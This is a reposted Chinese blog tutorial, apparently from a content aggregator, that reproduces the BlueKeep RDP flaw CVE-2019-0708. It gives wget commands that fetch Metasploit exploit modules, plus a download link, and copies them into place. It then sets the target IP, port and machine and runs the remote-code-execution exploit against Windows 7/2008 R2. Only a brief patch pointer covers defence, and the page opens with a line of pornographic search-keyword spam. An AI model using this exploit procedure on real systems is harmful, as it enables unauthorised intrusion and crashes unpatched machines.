日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

CVE 2019-0708漏洞复现防御修复

發布時間:2023/12/31 综合教程 32 生活家
生活随笔 收集整理的這篇文章主要介紹了 CVE 2019-0708漏洞复现防御修复 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

CVE-2019-0708

Windows再次被曝出一個破壞力巨大的高危遠程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標系統上執行任意代碼,包括獲取敏感信息、執行遠程代碼、發起拒絕服務攻擊等等攻擊行為。而更加嚴重的是,這個漏洞的觸發無需用戶交互,攻擊者可以用該漏洞制作堪比2017年席卷全球的WannaCry類蠕蟲病毒,從而進行大規模傳播和破壞。

影響范圍

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

首先更新我們的kaili

apt-get  install metasploit-framework

更新完成后

打開msfconsole 并未有利用程序只有檢測工具

下載 exp

網盤:鏈接: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ 提取碼: vh8h

wget 下載
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

把下載的文件

依次執行命令創建利用文件夾

mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir  -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb   /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp cve_2019_0708_bluekeep_rce.rb   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

重新打開msfconsole

重新加載

reload_all

我們導入

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

這個exp 目前只有 windwos 7 /2008r2 而且是社區閹割版容易藍屏

set RHOSTS 設置IP
set RPORT 設置RDP端口號
使用set target ID設置受害機機器
使用exploit開始攻擊,等待建立連接

當然也可以選其他的

show targets

直接run

之前復現過一次在復現就一執行就藍屏 放一張朋友成功的

而我的

漏洞修復

http://weishi.360.cn/mianyigongju.html

前往這個地址進行漏洞修復

總結

以上是生活随笔為你收集整理的CVE 2019-0708漏洞复现防御修复的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。